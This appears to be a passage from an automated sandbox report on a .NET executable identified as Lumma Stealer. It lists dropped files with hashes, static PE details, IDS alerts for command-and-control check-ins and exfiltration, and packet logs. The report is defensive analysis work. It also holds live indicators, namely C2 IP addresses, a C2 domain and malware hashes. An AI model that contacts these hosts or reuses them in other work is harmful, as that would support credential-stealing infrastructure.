	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	Unknown	Browse	172.67.162.84
	17323410655ab7b4ebaf9794a98546bfa9f8606c523f625a9e251d1f6b244b39e491609f0a676.dat-decoded.exe	Get hash	malicious	XWorm	Browse	104.20.3.235
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Loader.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.43.198 104.21.88.250
	loader.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.43.198 104.21.88.250
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.43.198 104.21.88.250
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.43.198 104.21.88.250
	file.exe	Get hash	malicious	Unknown	Browse	104.21.43.198 104.21.88.250
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.43.198 104.21.88.250
	file.exe	Get hash	malicious	Unknown	Browse	104.21.43.198 104.21.88.250
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.43.198 104.21.88.250
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	104.21.43.198 104.21.88.250
	Script.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.43.198 104.21.88.250

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_b.exe_6aed87d74fcac5fc678ad6e46e3a3777b5e2266d_f4d35178_8221b3c3-b7a5-460d-93de-9e5b89fe33c7\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9779097537291204
Encrypted:	false
SSDEEP:	96:tmFNMUsOsHKw5MldvxmoijCQXIDcQvc6QcEVcw3cE/H+BHUHZ0ownOgHkEwH3dEX:InMUsOsYkd0BU/qaGpezuiF1Z24IO8r
MD5:	4D8F918F1FDFFFAE24544295023B845D
SHA1:	3D87493091C12BA3704BD264D92CDE359EB54BF9
SHA-256:	9057E5BD12CAD2E09B10022521CC3C1A7948E0FD65D55245832AB27700A96711
SHA-512:	49A018E44823EB62AD23453418B303AF19431D5D2F562E7AEFC83CA2D33DE2DD4FDAFF60BEB9A71C2597272E1F27E317840F477A8496777EABB713EE0C29AFC4
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.8.2.7.4.9.9.1.8.2.6.6.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.6.8.2.7.5.0.0.1.5.1.4.0.2.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.2.2.1.b.3.c.3.-.b.7.a.5.-.4.6.0.d.-.9.3.d.e.-.9.e.5.b.8.9.f.e.3.3.c.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.c.7.f.2.e.b.d.-.7.1.f.5.-.4.0.d.d.-.b.e.4.d.-.3.6.c.c.9.8.e.1.5.d.8.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.u.b.y.L.i.a.m.V.i.o.l.e.t...z.Y.O.f.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.e.0.-.0.0.0.1.-.0.0.1.4.-.a.c.6.9.-.6.c.9.0.8.9.3.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.e.f.4.d.e.a.f.3.9.4.d.f.0.5.a.5.3.d.8.7.a.1.8.8.a.e.2.5.3.3.6.0.0.0.0.0.0.0.0.!.0.0.0.0.c.a.e.a.a.9.d.7.5.a.f.4.5.5.5.e.c.c.6.3.6.7.d.d.3.2.c.d.5.4.1.1.2.3.c.5.e.5.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER95AE.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Nov 23 09:24:59 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	189946
Entropy (8bit):	3.4636367944781457
Encrypted:	false
SSDEEP:	1536:VkoqjkrpN4uE2aOvELTgNXFVs2DP/SJlCD4XYWJ0pbjPJPq+9:Vko/D4uEqsLTgCm2w4R0pbtC+
MD5:	138884DBE9668CAAD1292825F17479B5
SHA1:	EF351530E1771F876AB19D99E21188499F17095D
SHA-256:	71D4BC78D7AF2BB946337967788CF11D0463FED1F9CEC8888ADA9CE034ED59E5
SHA-512:	EF6BB2839447FBBA443D7DF20385B3D520D2042CC15FA0780BC949EB54B90B28E84207D26CDC000B22995D26457AD5027CED30AD8339D8D1D34A2C1AE17A9A22
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......k.Ag............D...............X.......$................J..........`.......8...........T...........00.............,............ ..............................................................................eJ....... ......GenuineIntel............T...........j.Ag.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER968A.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8386
Entropy (8bit):	3.7042609150357624
Encrypted:	false
SSDEEP:	192:R6l7wVeJOA6l6Y9sSUjngmfZUYxfjprQ89bcWsfuLUm:R6lXJZ6l6Y2SUjngmfWY5jc1fud
MD5:	1C671253E951F552D5ABCC1C2C3C2093
SHA1:	ADB38A4070FBE54F762ECEFB389408FB440F3F5C
SHA-256:	31308B3F2C28FCA85F365734DE55A4B9EF8604DCE24CE3456FD724994D874CEB
SHA-512:	F0A44EE5B6E7B80013178E7443C774EF63C1BE3E72792278E29E5FFFF1F35EB9C73FDA9BB919CD2BBCB3689547BD8D47335C9AF3FF9720CBA9126A6C04AE43B4
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.4.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER96B9.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4737
Entropy (8bit):	4.500871348874029
Encrypted:	false
SSDEEP:	48:cvIwWl8zsaJg77aI98kqWpW8VYq0Ym8M4Jx2FIk+q8vlpqyN7npOd:uIjfoI77L7VFJgKGopOd
MD5:	1A27D0C3E875B6BFDF9A083AF01A5707
SHA1:	1DB0C9261DDDB1E35E4BD43E5252ED97FFDD5E25
SHA-256:	8CC8DCA8E072A8B273F2C711AAC7ABD22B2554F54EB550220F7419F89C1EEDDE
SHA-512:	4D227A0C0E6C286B53DB64A20FA1154AAF9E6A9181B08E89580D4E6FDB3D6D90097753875151C595490DF51C65439B63A2EF165DD0E11BD739D5B31D19B6A5DE
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="600507" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Roaming\gdi32.dll

Download File

Process:	C:\Users\user\Desktop\b.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	462848
Entropy (8bit):	7.1257309071219375
Encrypted:	false
SSDEEP:	12288:aklrtKjg1YBxbVonQXhT0doOFdNreYw3ZJyNnFJ/tPZirx1XTY6jyPCMIExFqJoL:DvKjKYBxbVonQXhT0doOFdNreYw3ZJyO
MD5:	EBC77EA19ED66BC10494A862C694C4D7
SHA1:	BB27DD01C052598DE09C5460FE241CB61BE86DE1
SHA-256:	1287FC59877EDEABFCCCDCB48ADCC0D626A12A4F466F496551859ACD5E8E95C2
SHA-512:	32EAE184B9E13D4501226A24C28EB368ED783662358E2642AD210DD7542F6AF66753554F63EB71292A9238EBBDC4B1FC02F6E9C376584DB6B72E100B8C345F81
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]6...W...W...W...<...W...<..W...<...W...<...W..>....W...W..{W..K"...W..K"...W..K"...W...W...W..."...W..."...W..Rich.W..........PE..L...q.@g...........!.........v...............................................@............@.............................\|.......P............................ ......\...............................x...@...............T............................text............................... ..`.rdata...\.......^..................@..@.data...............................@....reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465916496289131
Encrypted:	false
SSDEEP:	6144:wIXfpi67eLPU9skLmb0b4NWSPKaJG8nAgejZMMhA2gX4WABl0uNSdwBCswSbs:VXD94NWlLZMM6YFHY+s
MD5:	92F78B2AB1B72F32F21A4F36858FF709
SHA1:	0D425F12BFE278C953CC5A3B637C57F1C7C1122C
SHA-256:	F14E9D52AFCBE72EC283E32C567990E93C0CE053FBE3DEB881D8174EA4FB8C0F
SHA-512:	FF86D0F4E22E2A032F63A6893DCFCDD94F2B819EF7AB4CF3BDB2F8756552F90F55AE775BCE379FF9F8D92E2381B54F2D98DEC8EAA56B6C4AC24FC6A41F44EB0A
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmb....=..............................................................................................................................................................................................................................................................................................................................................M...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\b.exe
File Type:	ASCII text, with very long lines (350), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	1411
Entropy (8bit):	4.539958446792231
Encrypted:	false
SSDEEP:	24:7v74NuayMvXIUn2p/kpgw4r22Drrb2nknlusDp:7T4jyMff2p8p14nrPKktp
MD5:	7548DE235C6FF508119DBDAFE31226A0
SHA1:	9AF86E79C82BF0D0C3D7145DA7A41AAAD2E2F90C
SHA-256:	F7281B8DFBA6ADD95C1606327A1DC2E29D748FD680215E825F3BC756F5683BDF
SHA-512:	712C158DFD4CABAB490D42F04CE2A8C815D92B8A1BD591A7C3CC26DB41AB93902C13590B6F9353B183D47C3EB20AF9124788557E843719DD36DFF283C0B07E4D
Malicious:	false
Reputation:	low
Preview:	.Unhandled Exception: System.Resources.MissingManifestResourceException: Could not find any resources appropriate for the specified culture or the neutral culture. Make sure "caspol.resources" was correctly embedded or linked into assembly "RubyLiamViolet" at compile time, or that all the satellite assemblies required are loadable and fully signed... at System.Resources.ManifestBasedResourceGroveler.HandleResourceStreamMissing(String fileName).. at System.Resources.ManifestBasedResourceGroveler.GrovelForResourceSet(CultureInfo culture, Dictionary`2 localResourceSets, Boolean tryParents, Boolean createIfNotExists, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo requestedCulture, Boolean createIfNotExists, Boolean tryParents, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo culture, Boolean createIfNotExists, Boolean tryParents).. at System.Resources.ResourceManager.GetString

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.765253938991967
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	b.exe
File size:	716'800 bytes
MD5:	1d08526fc81b1d62195f4e5dea52bb6f
SHA1:	caeaa9d75af4555ecc6367dd32cd541123c5e5b6
SHA256:	5af91198860f878466493a6d92481fcc88d59a182cec02812ce6b3dcd1f0fa38
SHA512:	0ca26f2932933b4341d21e62873a818af13f4ab838da9a5274ebf5c5aa48653f3675ee805232aa31703e99b8adadebff9af9b78b59158a68e3d792c0d8070c62
SSDEEP:	12288:lhQGkvIZqiNSyk5IztFOZNzrn9fgkkAxjFS10dNy81Dtdd9am6wjYJ6OwUkXoK5b:lhQVJuINzrn53px5ndsGrdn6
TLSH:	50E48D9C766072EFC867D472DEA81CB4EA5074BB971F4207A02706AD9E1D88BCF150F6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r.@g..............0..............`... ... ....@.. ....................................@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4b600a
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6740A872 [Fri Nov 22 15:51:14 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [004B6000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x926f4	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb2000	0x640	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb4000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb6000	0x8
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x92000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
m@ka	0x2000	0x8ef5c	0x8f000	b33644dca1db622a0eeec01488cbaf72	False	1.0003175535402098	data	7.999658471887131	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.text	0x92000	0x1ef80	0x1f000	d818b86ae86d7715e48499313b884147	False	0.3296764742943548	data	4.689866894400597	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xb2000	0x640	0x800	6752790ea098d13cb7ab0fcc0109979e	False	0.35009765625	data	3.5595325261658877	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb4000	0xc	0x200	9d7743fe20d48f4946db51a87cf62226	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
	0xb6000	0x10	0x200	a93ef1ee99c8d5918b18fcaa9159b379	False	0.044921875	data	0.14263576814887827	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xb20a0	0x3b4	data			0.43248945147679324
RT_MANIFEST	0xb2454	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-23T10:25:00.042087+0100	2057646	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (revirepart .biz)	1	192.168.2.4	56745	1.1.1.1	53	UDP
2024-11-23T10:25:01.670163+0100	2057647	ET MALWARE Observed Win32/Lumma Stealer Related Domain (revirepart .biz in TLS SNI)	1	192.168.2.4	49730	104.21.43.198	443	TCP
2024-11-23T10:25:01.670163+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	104.21.43.198	443	TCP
2024-11-23T10:25:02.355799+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49730	104.21.43.198	443	TCP
2024-11-23T10:25:02.355799+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49730	104.21.43.198	443	TCP
2024-11-23T10:25:03.908693+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	104.21.88.250	443	TCP
2024-11-23T10:25:04.617752+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49732	104.21.88.250	443	TCP
2024-11-23T10:25:04.617752+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49732	104.21.88.250	443	TCP
2024-11-23T10:25:05.901261+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49734	104.21.88.250	443	TCP
2024-11-23T10:25:06.597888+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49734	104.21.88.250	443	TCP
2024-11-23T10:25:06.597888+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49734	104.21.88.250	443	TCP
2024-11-23T10:25:08.400820+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49737	104.21.88.250	443	TCP
2024-11-23T10:25:11.575585+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49740	104.21.88.250	443	TCP
2024-11-23T10:25:13.846176+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49742	104.21.88.250	443	TCP
2024-11-23T10:25:16.603881+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49744	104.21.88.250	443	TCP
2024-11-23T10:25:18.738157+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49747	104.21.88.250	443	TCP
2024-11-23T10:25:20.152926+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49747	104.21.88.250	443	TCP
2024-11-23T10:25:21.447907+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49749	104.21.88.250	443	TCP
2024-11-23T10:25:22.151291+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49749	104.21.88.250	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2024 10:25:00.356985092 CET	49730	443	192.168.2.4	104.21.43.198
Nov 23, 2024 10:25:00.357043028 CET	443	49730	104.21.43.198	192.168.2.4
Nov 23, 2024 10:25:00.357125044 CET	49730	443	192.168.2.4	104.21.43.198
Nov 23, 2024 10:25:00.361007929 CET	49730	443	192.168.2.4	104.21.43.198
Nov 23, 2024 10:25:00.361027956 CET	443	49730	104.21.43.198	192.168.2.4
Nov 23, 2024 10:25:01.670044899 CET	443	49730	104.21.43.198	192.168.2.4
Nov 23, 2024 10:25:01.670162916 CET	49730	443	192.168.2.4	104.21.43.198
Nov 23, 2024 10:25:01.677969933 CET	49730	443	192.168.2.4	104.21.43.198
Nov 23, 2024 10:25:01.677999020 CET	443	49730	104.21.43.198	192.168.2.4
Nov 23, 2024 10:25:01.678178072 CET	443	49730	104.21.43.198	192.168.2.4
Nov 23, 2024 10:25:01.721828938 CET	49730	443	192.168.2.4	104.21.43.198
Nov 23, 2024 10:25:01.725856066 CET	49730	443	192.168.2.4	104.21.43.198
Nov 23, 2024 10:25:01.725856066 CET	49730	443	192.168.2.4	104.21.43.198
Nov 23, 2024 10:25:01.725940943 CET	443	49730	104.21.43.198	192.168.2.4
Nov 23, 2024 10:25:02.355789900 CET	443	49730	104.21.43.198	192.168.2.4
Nov 23, 2024 10:25:02.355858088 CET	443	49730	104.21.43.198	192.168.2.4
Nov 23, 2024 10:25:02.355910063 CET	49730	443	192.168.2.4	104.21.43.198
Nov 23, 2024 10:25:02.358843088 CET	49730	443	192.168.2.4	104.21.43.198
Nov 23, 2024 10:25:02.358861923 CET	443	49730	104.21.43.198	192.168.2.4
Nov 23, 2024 10:25:02.600756884 CET	49732	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:02.600843906 CET	443	49732	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:02.600939989 CET	49732	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:02.601265907 CET	49732	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:02.601319075 CET	443	49732	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:03.908443928 CET	443	49732	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:03.908693075 CET	49732	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:03.921215057 CET	49732	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:03.921269894 CET	443	49732	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:03.921463013 CET	443	49732	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:03.923414946 CET	49732	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:03.923455000 CET	49732	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:03.923490047 CET	443	49732	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:04.617729902 CET	443	49732	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:04.617789984 CET	443	49732	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:04.617855072 CET	49732	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:04.618025064 CET	49732	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:04.618066072 CET	443	49732	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:04.618093014 CET	49732	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:04.618108034 CET	443	49732	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:04.689454079 CET	49734	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:04.689534903 CET	443	49734	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:04.689631939 CET	49734	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:04.689894915 CET	49734	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:04.689929008 CET	443	49734	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:05.901159048 CET	443	49734	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:05.901261091 CET	49734	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:05.902239084 CET	49734	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:05.902249098 CET	443	49734	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:05.902446985 CET	443	49734	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:05.908123016 CET	49734	443	192.168.2.4	104.21.88.250
